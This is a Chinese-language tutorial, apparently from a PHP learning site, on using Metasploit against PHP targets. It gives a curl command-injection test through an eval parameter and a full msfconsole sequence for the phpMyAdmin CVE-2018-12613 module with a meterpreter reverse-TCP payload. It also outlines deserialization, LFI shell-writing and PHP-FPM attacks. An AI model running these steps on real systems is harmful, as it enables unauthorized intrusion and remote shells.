Metasploit中无PHP语言本身漏洞的通用利用模块,其PHP相关exploit均绑定具体应用(如phpMyAdmin)或组件,需先手工验证环境再针对性使用模块。
metasploit 里没有现成的 PHP 漏洞利用模块
Metasploit 的 search 命令搜 php,返回的大多是 PHP Web 应用(如 WordPress、Joomla 插件)或服务端组件(如 phpMyAdmin、PHP-FPM)的漏洞模块,不是“PHP 语言本身”的通用漏洞利用。PHP 解析器层面的 RCE(比如 CVE-2019-11043、CVE-2021-41267)极少有稳定可用的 Metasploit 模块——官方不收录未验证、不可靠或依赖严苛环境的 exploit。
常见误操作是:search type:exploit platform:php → 返回空,或只看到 phpmyadmin、wordpress 等关键词模块,误以为“没东西”。其实问题不在搜索方式,而在目标本质:你真正要打的是运行 PHP 的 Web 应用或中间件,不是 PHP 解释器。
- Metasploit 的
php相关 exploit 全部绑定具体应用/版本,例如:exploit/multi/http/phpmyadmin_setup_exec - 纯 PHP 配置类漏洞(如
allow_url_include=On+expect://)无法自动化利用,需手动构造 payload - PHP 反序列化链(如 Laravel、Symfony)通常需定制 PoC,Metasploit 模块滞后且适配窄
先确认目标是否真有 PHP 环境可打
别急着开 msfconsole,先手工验证 PHP 是否在跑、能否执行代码。很多所谓“PHP 漏洞”其实是目录遍历、文件上传、SQL 注入后带出的 PHP Webshell,不是 PHP 解析器缺陷。
- 访问
/info.php或/test.php(内容为),看是否返回 PHP 版本和配置 - 检查
phpinfo()输出里的disable_functions和open_basedir—— 这俩直接决定后续命令执行能不能成功 - 用 curl 测试动态执行:
curl "http://target/test.php?c=system('id')"(前提是test.php含eval($_GET['c']);这类危险代码) - 若发现
phpMyAdmin、WordPress、Drupal等,用search name:phpmyadmin或search cve:2021-21551定向找模块
用 msf 打已知 PHP 应用漏洞的实操步骤
以 phpMyAdmin 4.8.0–4.8.1 的后台 RCE(CVE-2018-12613)为例,这是少数能直接进 meterpreter 的 PHP 生态漏洞:
立即学习“PHP免费学习笔记(深入)”;
use exploit/multi/http/phpmyadmin_481_lfi_rce set RHOSTS 192.168.1.100 set RPORT 80 set TARGETURI /phpmyadmin/ set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.5 set LPORT 4444 exploit
注意点:
-
TARGETURI必须精确到 phpMyAdmin 安装路径,错一位(比如写成/phpmyadmin少斜杠)就失败 - 该模块依赖 LFI 触发,若目标禁用了
allow_url_include或file_get_contents被禁,模块会静默退出 - 成功后 meterpreter session 权限取决于 PHP 进程用户(通常是
www-data),不是 root
别依赖 msf,手工验证比自动 exploit 更可靠
绝大多数 PHP 漏洞利用需要观察响应、调整参数、绕过 WAF,Metasploit 模块做不到这点。比如:
- PHP 反序列化:得先抓登录/cookie 的序列化数据,用
phpggc生成 gadget 链,再 base64 编码 POST 过去 - 文件包含(LFI):需配合
php://filter读源码、data://写 shell,msf 模块只覆盖最简路径 - PHP-FPM + Nginx FastCGI 漏洞(CVE-2019-11043):必须满足特定配置(
env[PATH]被覆盖),msf 没有通用模块,得用 Python 脚本发 raw packet
真正高效的 PHP 漏洞挖掘流程是:信息收集 → 手工验证 → 选 PoC(GitHub 搜 CVE 编号)→ 改参数 → 观察回显。Metasploit 只在批量验证已知应用漏洞时省时间,不是万能钥匙。
